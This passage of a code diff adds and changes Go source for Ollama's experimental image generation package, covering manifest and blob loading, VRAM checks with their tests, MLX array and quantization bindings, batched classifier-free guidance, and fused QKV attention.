goImg := image.NewRGBA(image.Rect(0, 0, W, H))
pix := goImg.Pix
for y := 0; y < H; y++ {
for x := 0; x < W; x++ {
srcIdx := (y*W + x) * C
dstIdx := (y*W + x) * 4
pix[dstIdx+0] = uint8(clampF(data[srcIdx+0]*255+0.5, 0, 255))
pix[dstIdx+1] = uint8(clampF(data[srcIdx+1]*255+0.5, 0, 255))
pix[dstIdx+2] = uint8(clampF(data[srcIdx+2]*255+0.5, 0, 255))
pix[dstIdx+3] = 255
}
}
return goImg, nil
}
func clampF(v, min, max float32) float32 {
if v < min {
return min
}
if v > max {
return max
}
return v
}

237
x/imagegen/manifest.go Normal file
View File

@@ -0,0 +1,237 @@
package imagegen
import (
"encoding/json"
"fmt"
"io"
"os"
"path/filepath"
"runtime"
"strings"
)
// ManifestLayer represents a layer in the manifest.
type ManifestLayer struct {
MediaType string `json:"mediaType"`
Digest string `json:"digest"`
Size int64 `json:"size"`
Name string `json:"name,omitempty"` // Path-style name: "component/tensor" or "path/to/config.json"
}
// Manifest represents the manifest JSON structure.
type Manifest struct {
SchemaVersion int `json:"schemaVersion"`
MediaType string `json:"mediaType"`
Config ManifestLayer `json:"config"`
Layers []ManifestLayer `json:"layers"`
}
// ModelManifest holds a parsed manifest with helper methods.
type ModelManifest struct {
Manifest *Manifest
BlobDir string
}
// DefaultBlobDir returns the default blob storage directory.
func DefaultBlobDir() string {
home, err := os.UserHomeDir()
if err != nil {
home = "."
}
switch runtime.GOOS {
case "darwin":
return filepath.Join(home, ".ollama", "models", "blobs")
case "linux":
return filepath.Join(home, ".ollama", "models", "blobs")
case "windows":
return filepath.Join(home, ".ollama", "models", "blobs")
default:
return filepath.Join(home, ".ollama", "models", "blobs")
}
}
// DefaultManifestDir returns the default manifest storage directory.
func DefaultManifestDir() string {
home, err := os.UserHomeDir()
if err != nil {
home = "."
}
return filepath.Join(home, ".ollama", "models", "manifests")
}
// LoadManifest loads a manifest for the given model name.
// Model name format: "modelname" or "modelname:tag" or "host/namespace/name:tag"
func LoadManifest(modelName string) (*ModelManifest, error) {
manifestPath := resolveManifestPath(modelName)
data, err := os.ReadFile(manifestPath)
if err != nil {
return nil, fmt.Errorf("read manifest: %w", err)
}
var manifest Manifest
if err := json.Unmarshal(data, &manifest); err != nil {
return nil, fmt.Errorf("parse manifest: %w", err)
}
return &ModelManifest{
Manifest: &manifest,
BlobDir: DefaultBlobDir(),
}, nil
}
// resolveManifestPath converts a model name to a manifest file path.
func resolveManifestPath(modelName string) string {
// Parse model name into components
// Default: registry.ollama.ai/library/<name>/<tag>
host := "registry.ollama.ai"
namespace := "library"
name := modelName
tag := "latest"
// Handle explicit tag
if idx := strings.LastIndex(name, ":"); idx != -1 {
tag = name[idx+1:]
name = name[:idx]
}
// Handle full path like "host/namespace/name"
parts := strings.Split(name, "/")
switch len(parts) {
case 3:
host = parts[0]
namespace = parts[1]
name = parts[2]
case 2:
namespace = parts[0]
name = parts[1]
}
return filepath.Join(DefaultManifestDir(), host, namespace, name, tag)
}
// BlobPath returns the full path to a blob given its digest.
func (m *ModelManifest) BlobPath(digest string) string {
// Convert "sha256:abc123" to "sha256-abc123"
blobName := strings.Replace(digest, ":", "-", 1)
return filepath.Join(m.BlobDir, blobName)
}
// GetTensorLayers returns all tensor layers for a given component.
// Component should be "text_encoder", "transformer", or "vae".
// Tensor names are path-style: "component/tensor_name" (e.g., "text_encoder/model.embed_tokens.weight").
func (m *ModelManifest) GetTensorLayers(component string) []ManifestLayer {
prefix := component + "/"
var layers []ManifestLayer
for _, layer := range m.Manifest.Layers {
if layer.MediaType == "application/vnd.ollama.image.tensor" && strings.HasPrefix(layer.Name, prefix) {
layers = append(layers, layer)
}
}
return layers
}
// GetConfigLayer returns the config layer for a given path.
func (m *ModelManifest) GetConfigLayer(configPath string) *ManifestLayer {
for _, layer := range m.Manifest.Layers {
if layer.MediaType == "application/vnd.ollama.image.json" && layer.Name == configPath {
return &layer
}
}
return nil
}
// ReadConfig reads and returns the content of a config file.
func (m *ModelManifest) ReadConfig(configPath string) ([]byte, error) {
layer := m.GetConfigLayer(configPath)
if layer == nil {
return nil, fmt.Errorf("config %q not found in manifest", configPath)
}
blobPath := m.BlobPath(layer.Digest)
return os.ReadFile(blobPath)
}
// ReadConfigJSON reads and unmarshals a config file.
func (m *ModelManifest) ReadConfigJSON(configPath string, v any) error {
data, err := m.ReadConfig(configPath)
if err != nil {
return err
}
return json.Unmarshal(data, v)
}
// OpenBlob opens a blob for reading.
func (m *ModelManifest) OpenBlob(digest string) (io.ReadCloser, error) {
return os.Open(m.BlobPath(digest))
}
// HasTensorLayers returns true if the manifest has any tensor layers.
func (m *ModelManifest) HasTensorLayers() bool {
for _, layer := range m.Manifest.Layers {
if layer.MediaType == "application/vnd.ollama.image.tensor" {
return true
}
}
return false
}
// ModelInfo contains metadata about an image generation model.
type ModelInfo struct {
Architecture string
ParameterCount int64
Quantization string
}
// GetModelInfo returns metadata about an image generation model.
func GetModelInfo(modelName string) (*ModelInfo, error) {
manifest, err := LoadManifest(modelName)
if err != nil {
return nil, fmt.Errorf("failed to load manifest: %w", err)
}
info := &ModelInfo{}
// Read model_index.json for architecture, parameter count, and quantization
if data, err := manifest.ReadConfig("model_index.json"); err == nil {
var index struct {
Architecture string `json:"architecture"`
ParameterCount int64 `json:"parameter_count"`
Quantization string `json:"quantization"`
}
if json.Unmarshal(data, &index) == nil {
info.Architecture = index.Architecture
info.ParameterCount = index.ParameterCount
info.Quantization = index.Quantization
}
}
// Fallback: detect quantization from tensor names if not in config
if info.Quantization == "" {
for _, layer := range manifest.Manifest.Layers {
if strings.HasSuffix(layer.Name, ".weight_scale") {
info.Quantization = "FP8"
break
}
}
if info.Quantization == "" {
info.Quantization = "BF16"
}
}
// Fallback: estimate parameter count if not in config
if info.ParameterCount == 0 {
var totalSize int64
for _, layer := range manifest.Manifest.Layers {
if layer.MediaType == "application/vnd.ollama.image.tensor" {
if !strings.HasSuffix(layer.Name, "_scale") && !strings.HasSuffix(layer.Name, "_qbias") {
totalSize += layer.Size
}
}
}
// Assume BF16 (2 bytes/param) as rough estimate
info.ParameterCount = totalSize / 2
}
return info, nil
}

97
x/imagegen/memory.go Normal file
View File

@@ -0,0 +1,97 @@
// Package imagegen provides experimental image generation capabilities for Ollama.
//
// This package is in x/ because the tensor model storage format is under development.
// The goal is to integrate these capabilities into the main Ollama packages once
// the format is stable.
//
// TODO (jmorganca): Integrate into main packages when stable:
// - CLI commands → cmd/
// - API endpoints → api/
// - Model creation → server/
package imagegen
import (
"encoding/json"
"fmt"
"runtime"
)
// GB is a convenience constant for gigabytes.
const GB = 1024 * 1024 * 1024
// SupportedBackends lists the backends that support image generation.
var SupportedBackends = []string{"metal", "cuda", "cpu"}
// modelVRAMEstimates maps pipeline class names to their estimated VRAM requirements.
var modelVRAMEstimates = map[string]uint64{
"ZImagePipeline": 21 * GB, // ~21GB for Z-Image (text encoder + transformer + VAE)
"FluxPipeline": 21 * GB, // ~21GB for Flux (same architecture)
"QwenImagePipeline": 80 * GB, // TODO: verify actual requirements, using conservative estimate for now
}
// CheckPlatformSupport validates that image generation is supported on the current platform.
// Returns nil if supported, or an error describing why it's not supported.
func CheckPlatformSupport() error {
switch runtime.GOOS {
case "darwin":
// macOS: Metal is supported via MLX
if runtime.GOARCH != "arm64" {
return fmt.Errorf("image generation on macOS requires Apple Silicon (arm64), got %s", runtime.GOARCH)
}
return nil
case "linux", "windows":
// Linux/Windows: CUDA support (requires mlx or cuda build)
// The actual backend availability is checked at runtime
return nil
default:
return fmt.Errorf("image generation is not supported on %s", runtime.GOOS)
}
}
// CheckMemoryRequirements validates that there's enough memory for image generation.
// Returns nil if memory is sufficient, or an error if not.
func CheckMemoryRequirements(modelName string, availableMemory uint64) error {
required := EstimateVRAM(modelName)
if availableMemory < required {
return fmt.Errorf("insufficient memory for image generation: need %d GB, have %d GB",
required/GB, availableMemory/GB)
}
return nil
}
// ResolveModelName checks if a model name is a known image generation model.
// Returns the normalized model name if found, empty string otherwise.
func ResolveModelName(modelName string) string {
manifest, err := LoadManifest(modelName)
if err == nil && manifest.HasTensorLayers() {
return modelName
}
return ""
}
// EstimateVRAM returns the estimated VRAM needed for an image generation model.
// Returns a conservative default of 21GB if the model type cannot be determined.
func EstimateVRAM(modelName string) uint64 {
manifest, err := LoadManifest(modelName)
if err != nil {
return 21 * GB
}
data, err := manifest.ReadConfig("model_index.json")
if err != nil {
return 21 * GB
}
// Parse just the class name
var index struct {
ClassName string `json:"_class_name"`
}
if err := json.Unmarshal(data, &index); err != nil {
return 21 * GB
}
if estimate, ok := modelVRAMEstimates[index.ClassName]; ok {
return estimate
}
return 21 * GB
}

103
x/imagegen/memory_test.go Normal file
View File

@@ -0,0 +1,103 @@
package imagegen
import (
"runtime"
"testing"
)
func TestCheckPlatformSupport(t *testing.T) {
err := CheckPlatformSupport()
switch runtime.GOOS {
case "darwin":
if runtime.GOARCH == "arm64" {
if err != nil {
t.Errorf("Expected nil error on darwin/arm64, got: %v", err)
}
} else {
if err == nil {
t.Error("Expected error on darwin/non-arm64")
}
}
case "linux", "windows":
if err != nil {
t.Errorf("Expected nil error on %s, got: %v", runtime.GOOS, err)
}
default:
if err == nil {
t.Errorf("Expected error on unsupported platform %s", runtime.GOOS)
}
}
}
func TestCheckMemoryRequirements(t *testing.T) {
tests := []struct {
name string
availableMemory uint64
wantErr bool
}{
{
name: "sufficient memory",
availableMemory: 32 * GB,
wantErr: false,
},
{
name: "exactly enough memory",
availableMemory: 21 * GB,
wantErr: false,
},
{
name: "insufficient memory",
availableMemory: 16 * GB,
wantErr: true,
},
{
name: "zero memory",
availableMemory: 0,
wantErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Use a non-existent model name which will default to 21GB estimate
err := CheckMemoryRequirements("nonexistent-model", tt.availableMemory)
if (err != nil) != tt.wantErr {
t.Errorf("CheckMemoryRequirements() error = %v, wantErr %v", err, tt.wantErr)
}
})
}
}
func TestModelVRAMEstimates(t *testing.T) {
// Verify the VRAM estimates map has expected entries
expected := map[string]uint64{
"ZImagePipeline": 21 * GB,
"FluxPipeline": 21 * GB,
"QwenImagePipeline": 80 * GB,
}
for name, expectedVRAM := range expected {
if actual, ok := modelVRAMEstimates[name]; !ok {
t.Errorf("Missing VRAM estimate for %s", name)
} else if actual != expectedVRAM {
t.Errorf("VRAM estimate for %s = %d GB, want %d GB", name, actual/GB, expectedVRAM/GB)
}
}
}
func TestEstimateVRAMDefault(t *testing.T) {
// Non-existent model should return default 21GB
vram := EstimateVRAM("nonexistent-model-that-does-not-exist")
if vram != 21*GB {
t.Errorf("EstimateVRAM() = %d GB, want 21 GB", vram/GB)
}
}
func TestResolveModelName(t *testing.T) {
// Non-existent model should return empty string
result := ResolveModelName("nonexistent-model")
if result != "" {
t.Errorf("ResolveModelName() = %q, want empty string", result)
}
}

View File

@@ -11,6 +11,10 @@ package mlx
#include "mlx/c/mlx.h"
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
// Forward declare cpu_stream
static mlx_stream cpu_stream();
// Cached default GPU stream for all ops
static mlx_stream _default_stream = {0};
@@ -603,6 +607,11 @@ func (a *Array) Valid() bool {
return a != nil && a.c.ctx != nil
}
// Kept returns true if the array is marked to survive Eval() cleanup.
func (a *Array) Kept() bool {
return a != nil && a.kept
}
func int32ToCInt(s []int32) *C.int {
if len(s) == 0 {
return nil
@@ -1026,10 +1035,11 @@ func View(a *Array, dtype int) *Array {
return newArray(res)
}
// Contiguous returns a contiguous copy of the array
// Contiguous returns a contiguous copy of the array (row-major)
func Contiguous(a *Array) *Array {
res := C.mlx_array_new()
C.mlx_contiguous(&res, a.c, true, C.default_stream())
// Use allow_col=false to force row-major contiguous layout
C.mlx_contiguous(&res, a.c, false, C.default_stream())
return newArray(res)
}
@@ -1475,6 +1485,44 @@ func (a *Array) ItemInt32() int32 {
return int32(val)
}
// Bytes copies the raw bytes out of the array without type conversion.
// Works with common dtypes (float32, int32, uint32, uint8).
// For non-contiguous arrays, call Contiguous() first.
// Note: Triggers cleanup of non-kept arrays.
func (a *Array) Bytes() []byte {
cleanup()
nbytes := a.Nbytes()
if nbytes == 0 {
return nil
}
// Get raw pointer based on dtype
var ptr unsafe.Pointer
switch a.Dtype() {
case DtypeFloat32:
ptr = unsafe.Pointer(C.mlx_array_data_float32(a.c))
case DtypeInt32:
ptr = unsafe.Pointer(C.mlx_array_data_int32(a.c))
case DtypeUint32:
ptr = unsafe.Pointer(C.mlx_array_data_uint32(a.c))
case DtypeUint8:
ptr = unsafe.Pointer(C.mlx_array_data_uint8(a.c))
default:
// For other types (bf16, f16, etc), convert to float32
arr := AsType(a, DtypeFloat32)
arr.Eval()
ptr = unsafe.Pointer(C.mlx_array_data_float32(arr.c))
nbytes = arr.Nbytes()
}
if ptr == nil {
return nil
}
data := make([]byte, nbytes)
copy(data, unsafe.Slice((*byte)(ptr), nbytes))
return data
}
// ============ Utility ============
// String returns a string representation
@@ -1653,6 +1701,34 @@ func (s *SafetensorsFile) Free() {
C.mlx_map_string_to_string_free(s.metadata)
}
// SaveSafetensors saves arrays to a safetensors file using MLX's native implementation.
// This correctly handles all dtypes including uint32 for quantized weights.
func SaveSafetensors(path string, arrays map[string]*Array) error {
cPath := C.CString(path)
defer C.free(unsafe.Pointer(cPath))
// Create the map
cArrays := C.mlx_map_string_to_array_new()
defer C.mlx_map_string_to_array_free(cArrays)
// Add each array to the map
for name, arr := range arrays {
cName := C.CString(name)
C.mlx_map_string_to_array_insert(cArrays, cName, arr.c)
C.free(unsafe.Pointer(cName))
}
// Create empty metadata (optional)
cMeta := C.mlx_map_string_to_string_new()
defer C.mlx_map_string_to_string_free(cMeta)
// Save
if C.mlx_save_safetensors(cPath, cArrays, cMeta) != 0 {
return fmt.Errorf("failed to save safetensors: %s", path)
}
return nil
}
// ============ NPY Loading ============
// LoadNpy loads a numpy array from an npy file
@@ -1762,11 +1838,16 @@ func RandomCategorical(logits *Array, axis int, numSamples int) *Array {
return RandomCategoricalWithKey(logits, key2, axis, numSamples)
}
// RandomNormal creates a random normal (Gaussian) tensor
// RandomNormal creates a random normal (Gaussian) tensor in float32
func RandomNormal(shape []int32, seed uint64) *Array {
return RandomNormalWithDtype(shape, seed, DtypeFloat32)
}
// RandomNormalWithDtype creates a random normal (Gaussian) tensor with specified dtype
func RandomNormalWithDtype(shape []int32, seed uint64, dtype Dtype) *Array {
key := RandomKey(seed)
res := C.mlx_array_new()
C.mlx_random_normal(&res, int32ToCInt(shape), C.size_t(len(shape)), C.MLX_FLOAT32, 0.0, 1.0, key.c, C.default_stream())
C.mlx_random_normal(&res, int32ToCInt(shape), C.size_t(len(shape)), C.mlx_dtype(dtype), 0.0, 1.0, key.c, C.default_stream())
return newArray(res)
}
@@ -1976,7 +2057,8 @@ func GatherQMM(x, w, scales *Array, biases, lhsIndices, rhsIndices *Array, trans
// Returns (quantized_weights, scales, biases).
// groupSize: number of elements quantized together (default 64)
// bits: bits per element, 2, 4, or 8 (default 4)
// mode: "affine" (default) or "mxfp4"
// mode: "affine" (default), "mxfp4", or "mxfp8"
// Note: mxfp8 mode returns nil biases (only weights and scales)
func Quantize(w *Array, groupSize, bits int, mode string) (weights, scales, biases *Array) {
cMode := C.CString(mode)
defer C.free(unsafe.Pointer(cMode))
@@ -1985,14 +2067,21 @@ func Quantize(w *Array, groupSize, bits int, mode string) (weights, scales, bias
res := C.mlx_vector_array_new()
C.mlx_quantize(&res, w.c, optGroupSize, optBits, cMode, C.default_stream())
// Result is a vector of 3 arrays: [weights, scales, biases]
// Result is a vector of arrays: [weights, scales, biases?]
// mxfp8 mode returns only 2 elements (no biases)
vecSize := int(C.mlx_vector_array_size(res))
var w0, w1, w2 C.mlx_array
C.mlx_vector_array_get(&w0, res, 0)
C.mlx_vector_array_get(&w1, res, 1)
C.mlx_vector_array_get(&w2, res, 2)
if vecSize >= 3 {
C.mlx_vector_array_get(&w2, res, 2)
}
C.mlx_vector_array_free(res)
return newArray(w0), newArray(w1), newArray(w2)
if vecSize >= 3 {
return newArray(w0), newArray(w1), newArray(w2)
}
return newArray(w0), newArray(w1), nil
}
// Dequantize reconstructs weights from quantized form.

View File

@@ -9,6 +9,7 @@ import (
"path/filepath"
"time"
"github.com/ollama/ollama/x/imagegen"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/tokenizer"
@@ -172,7 +173,7 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
cfg.Height = 1024
}
if cfg.Steps <= 0 {
cfg.Steps = 30
cfg.Steps = 50
}
if cfg.CFGScale <= 0 {
cfg.CFGScale = 4.0
@@ -222,6 +223,14 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
mlx.Keep(posEmb, negEmb)
}
// Pre-compute batched embeddings for CFG (single forward pass optimization)
var batchedEmb *mlx.Array
if useCFG {
batchedEmb = mlx.Concatenate([]*mlx.Array{posEmb, negEmb}, 0)
mlx.Keep(batchedEmb)
mlx.Eval(batchedEmb)
}
// Scheduler
scheduler := NewFlowMatchScheduler(DefaultSchedulerConfig())
scheduler.SetTimesteps(cfg.Steps, imgSeqLen)
@@ -264,10 +273,19 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
var output *mlx.Array
if useCFG {
// True CFG: run twice and combine with norm rescaling
// CFG Batching: single forward pass with batch=2
// Note: layer caching with CFG is not supported yet (would need 2 caches)
posOutput := m.Transformer.Forward(patches, posEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
negOutput := m.Transformer.Forward(patches, negEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
batchedPatches := mlx.Tile(patches, []int32{2, 1, 1})
batchedTimestep := mlx.Tile(timestep, []int32{2})
// Single batched forward pass
batchedOutput := m.Transformer.Forward(batchedPatches, batchedEmb, batchedTimestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
// Split output: [2, L, D] -> pos [1, L, D], neg [1, L, D]
L := batchedOutput.Shape()[1]
D := batchedOutput.Shape()[2]
posOutput := mlx.Slice(batchedOutput, []int32{0, 0, 0}, []int32{1, L, D})
negOutput := mlx.Slice(batchedOutput, []int32{1, 0, 0}, []int32{2, L, D})
diff := mlx.Sub(posOutput, negOutput)
scaledDiff := mlx.MulScalar(diff, cfg.CFGScale)
@@ -305,6 +323,9 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
if negEmb != nil {
negEmb.Free()
}
if batchedEmb != nil {
batchedEmb.Free()
}
ropeCache.ImgFreqs.Free()
ropeCache.TxtFreqs.Free()
if stepCache != nil {

View File

@@ -241,6 +241,14 @@ func (m *Model) edit(inputImagePaths []string, cfg *GenerateConfig) (*mlx.Array,
mlx.Eval(posEmb, negEmb)
}
// Pre-compute batched embeddings for CFG (single forward pass optimization)
var batchedEmb *mlx.Array
if useCFG {
batchedEmb = mlx.Concatenate([]*mlx.Array{posEmb, negEmb}, 0)
mlx.Keep(batchedEmb)
mlx.Eval(batchedEmb)
}
// Encode all input images to latents and concatenate
fmt.Println("Encoding images to latents...")
allImageLatentsPacked := make([]*mlx.Array, len(vaeImages))
@@ -291,11 +299,18 @@ func (m *Model) edit(inputImagePaths []string, cfg *GenerateConfig) (*mlx.Array,
var output *mlx.Array
if useCFG {
posOutput := m.Transformer.Forward(latentInput, posEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
negOutput := m.Transformer.Forward(latentInput, negEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
// CFG Batching: single forward pass with batch=2
// Tile inputs: [1, L, D] -> [2, L, D]
batchedLatentInput := mlx.Tile(latentInput, []int32{2, 1, 1})
batchedTimestep := mlx.Tile(timestep, []int32{2})
posOutput = mlx.Slice(posOutput, []int32{0, 0, 0}, []int32{1, imgSeqLen, posOutput.Shape()[2]})
negOutput = mlx.Slice(negOutput, []int32{0, 0, 0}, []int32{1, imgSeqLen, negOutput.Shape()[2]})
// Single batched forward pass
batchedOutput := m.Transformer.Forward(batchedLatentInput, batchedEmb, batchedTimestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
// Split output: [2, L, D] -> pos [1, L, D], neg [1, L, D]
D := batchedOutput.Shape()[2]
posOutput := mlx.Slice(batchedOutput, []int32{0, 0, 0}, []int32{1, imgSeqLen, D})
negOutput := mlx.Slice(batchedOutput, []int32{1, 0, 0}, []int32{2, imgSeqLen, D})
output = applyCFGWithNormRescale(posOutput, negOutput, cfg.CFGScale)
} else {
@@ -317,6 +332,9 @@ func (m *Model) edit(inputImagePaths []string, cfg *GenerateConfig) (*mlx.Array,
if negEmb != nil {
negEmb.Free()
}
if batchedEmb != nil {
batchedEmb.Free()
}
ropeCache.ImgFreqs.Free()
ropeCache.TxtFreqs.Free()
imageLatentsPacked.Free()

View File

@@ -128,14 +128,9 @@ func (s *FlowMatchEulerScheduler) AddNoise(cleanSample, noise *mlx.Array, timest
return mlx.Add(scaledClean, scaledNoise)
}
// InitNoise creates initial noise for sampling
// InitNoise creates initial noise for sampling (BFloat16 for GPU efficiency)
func (s *FlowMatchEulerScheduler) InitNoise(shape []int32, seed int64) *mlx.Array {
return RandomNormal(shape, seed)
}
// RandomNormal creates a random normal tensor using MLX
func RandomNormal(shape []int32, seed int64) *mlx.Array {
return mlx.RandomNormal(shape, uint64(seed))
return mlx.RandomNormalWithDtype(shape, uint64(seed), mlx.DtypeBFloat16)
}
// GetLatentShape returns the latent shape for a given image size

View File

@@ -3,12 +3,10 @@
package zimage
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
"github.com/ollama/ollama/x/imagegen/safetensors"
@@ -28,27 +26,14 @@ type Qwen3Config struct {
HeadDim int32 `json:"head_dim"`
}
// loadQwen3Config loads text encoder config from a JSON file
func loadQwen3Config(path string) (*Qwen3Config, error) {
data, err := os.ReadFile(path)
if err != nil {
return nil, fmt.Errorf("read config: %w", err)
}
var cfg Qwen3Config
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
return &cfg, nil
}
// Qwen3Attention implements Qwen3 attention with QK norms
type Qwen3Attention struct {
QProj *nn.Linear `weight:"q_proj"`
KProj *nn.Linear `weight:"k_proj"`
VProj *nn.Linear `weight:"v_proj"`
OProj *nn.Linear `weight:"o_proj"`
QNorm *nn.RMSNorm `weight:"q_norm"`
KNorm *nn.RMSNorm `weight:"k_norm"`
QProj nn.LinearLayer `weight:"q_proj"`
KProj nn.LinearLayer `weight:"k_proj"`
VProj nn.LinearLayer `weight:"v_proj"`
OProj nn.LinearLayer `weight:"o_proj"`
QNorm *nn.RMSNorm `weight:"q_norm"`
KNorm *nn.RMSNorm `weight:"k_norm"`
// Computed fields
NHeads int32
NKVHeads int32
@@ -151,9 +136,9 @@ func repeatKV(x *mlx.Array, repeats int32) *mlx.Array {
// Qwen3MLP implements Qwen3 SwiGLU MLP
type Qwen3MLP struct {
GateProj *nn.Linear `weight:"gate_proj"`
UpProj *nn.Linear `weight:"up_proj"`
DownProj *nn.Linear `weight:"down_proj"`
GateProj nn.LinearLayer `weight:"gate_proj"`
UpProj nn.LinearLayer `weight:"up_proj"`
DownProj nn.LinearLayer `weight:"down_proj"`
}
// Forward applies the MLP
@@ -194,33 +179,44 @@ type Qwen3TextEncoder struct {
*Qwen3Config
}
// Load loads the Qwen3 text encoder from a directory
func (m *Qwen3TextEncoder) Load(path string) error {
fmt.Println("Loading Qwen3 text encoder...")
// Load loads the Qwen3 text encoder from ollama blob storage.
func (m *Qwen3TextEncoder) Load(manifest *imagegen.ModelManifest) error {
fmt.Print(" Loading text encoder... ")
// Load config
cfg, err := loadQwen3Config(filepath.Join(path, "config.json"))
if err != nil {
// Load config from blob
var cfg Qwen3Config
if err := manifest.ReadConfigJSON("text_encoder/config.json", &cfg); err != nil {
return fmt.Errorf("config: %w", err)
}
m.Qwen3Config = cfg
// Pre-allocate layers slice
m.Qwen3Config = &cfg
m.Layers = make([]*Qwen3Block, cfg.NumHiddenLayers)
// Load weights
weights, err := safetensors.LoadModelWeights(path)
// Load weights from tensor blobs
weights, err := imagegen.LoadWeightsFromManifest(manifest, "text_encoder")
if err != nil {
return fmt.Errorf("weights: %w", err)
}
if err := weights.Load(0); err != nil {
return fmt.Errorf("load weights: %w", err)
}
defer weights.ReleaseAll()
fmt.Print(" Loading weights via struct tags... ")
return m.loadWeights(weights)
}
// loadWeights loads weights from any WeightSource into the model
func (m *Qwen3TextEncoder) loadWeights(weights safetensors.WeightSource) error {
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return fmt.Errorf("load module: %w", err)
}
m.initComputedFields()
fmt.Println("✓")
return nil
}
// Initialize computed fields
// initComputedFields initializes computed fields after loading weights
func (m *Qwen3TextEncoder) initComputedFields() {
cfg := m.Qwen3Config
m.FinalNorm.Eps = cfg.RMSNormEps
for _, block := range m.Layers {
// Attention
@@ -235,9 +231,6 @@ func (m *Qwen3TextEncoder) Load(path string) error {
block.InputLayerNorm.Eps = cfg.RMSNormEps
block.PostAttnLayerNorm.Eps = cfg.RMSNormEps
}
weights.ReleaseAll()
return nil
}
// Forward encodes text tokens

View File

@@ -4,12 +4,10 @@
package zimage
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
@@ -38,8 +36,8 @@ type TransformerConfig struct {
// TimestepEmbedder creates sinusoidal timestep embeddings
// Output dimension is 256 (fixed), used for AdaLN modulation
type TimestepEmbedder struct {
Linear1 *nn.Linear `weight:"mlp.0"`
Linear2 *nn.Linear `weight:"mlp.2"`
Linear1 nn.LinearLayer `weight:"mlp.0"`
Linear2 nn.LinearLayer `weight:"mlp.2"`
FreqEmbedSize int32 // 256 (computed)
}
@@ -76,7 +74,7 @@ func (te *TimestepEmbedder) Forward(t *mlx.Array) *mlx.Array {
// XEmbedder embeds image patches to model dimension
type XEmbedder struct {
Linear *nn.Linear `weight:"2-1"`
Linear nn.LinearLayer `weight:"2-1"`
}
// Forward embeds patchified image latents
@@ -88,7 +86,7 @@ func (xe *XEmbedder) Forward(x *mlx.Array) *mlx.Array {
// CapEmbedder projects caption features to model dimension
type CapEmbedder struct {
Norm *nn.RMSNorm `weight:"0"`
Linear *nn.Linear `weight:"1"`
Linear nn.LinearLayer `weight:"1"`
PadToken *mlx.Array // loaded separately at root level
}
@@ -102,12 +100,13 @@ func (ce *CapEmbedder) Forward(capFeats *mlx.Array) *mlx.Array {
// FeedForward implements SwiGLU FFN
type FeedForward struct {
W1 *nn.Linear `weight:"w1"` // gate projection
W2 *nn.Linear `weight:"w2"` // down projection
W3 *nn.Linear `weight:"w3"` // up projection
W1 nn.LinearLayer `weight:"w1"` // gate projection
W2 nn.LinearLayer `weight:"w2"` // down projection
W3 nn.LinearLayer `weight:"w3"` // up projection
OutDim int32 // computed from W2
}
// Forward applies SwiGLU: silu(W1(x)) * W3(x), then W2
func (ff *FeedForward) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
@@ -117,6 +116,7 @@ func (ff *FeedForward) Forward(x *mlx.Array) *mlx.Array {
// Reshape for matmul
x = mlx.Reshape(x, B*L, D)
gate := ff.W1.Forward(x)
gate = mlx.SiLU(gate)
up := ff.W3.Forward(x)
@@ -128,17 +128,69 @@ func (ff *FeedForward) Forward(x *mlx.Array) *mlx.Array {
// Attention implements multi-head attention with QK norm
type Attention struct {
ToQ *nn.Linear `weight:"to_q"`
ToK *nn.Linear `weight:"to_k"`
ToV *nn.Linear `weight:"to_v"`
ToOut *nn.Linear `weight:"to_out.0"`
ToQ nn.LinearLayer `weight:"to_q"`
ToK nn.LinearLayer `weight:"to_k"`
ToV nn.LinearLayer `weight:"to_v"`
ToOut nn.LinearLayer `weight:"to_out.0"`
NormQ *mlx.Array `weight:"norm_q.weight"` // [head_dim] for per-head RMSNorm
NormK *mlx.Array `weight:"norm_k.weight"`
// Computed fields
NHeads int32
HeadDim int32
Dim int32
Scale float32
// Fused QKV (computed at init time for efficiency, not loaded from weights)
ToQKV nn.LinearLayer `weight:"-"` // Fused Q+K+V projection (created by FuseQKV)
Fused bool `weight:"-"` // Whether to use fused QKV path
// Computed fields (not loaded from weights)
NHeads int32 `weight:"-"`
HeadDim int32 `weight:"-"`
Dim int32 `weight:"-"`
Scale float32 `weight:"-"`
}
// FuseQKV creates a fused QKV projection by concatenating weights.
// This reduces 3 matmuls to 1 for a ~5-10% speedup.
// Note: Fusion is skipped for quantized weights as it would require complex
// dequant-concat-requant operations. The FP8 memory bandwidth savings outweigh
// the ~5% fusion benefit.
func (attn *Attention) FuseQKV() {
if attn.ToQ == nil || attn.ToK == nil || attn.ToV == nil {
return
}
// Skip fusion for quantized weights - type assert to check
toQ, qOk := attn.ToQ.(*nn.Linear)
toK, kOk := attn.ToK.(*nn.Linear)
toV, vOk := attn.ToV.(*nn.Linear)
if !qOk || !kOk || !vOk {
// One or more are QuantizedLinear, skip fusion
return
}
if toQ.Weight == nil || toK.Weight == nil || toV.Weight == nil {
return
}
// Concatenate weights: [dim, dim] x 3 -> [3*dim, dim]
// Weight shapes: ToQ.Weight [out_dim, in_dim], etc.
qWeight := toQ.Weight
kWeight := toK.Weight
vWeight := toV.Weight
// Concatenate along output dimension (axis 0)
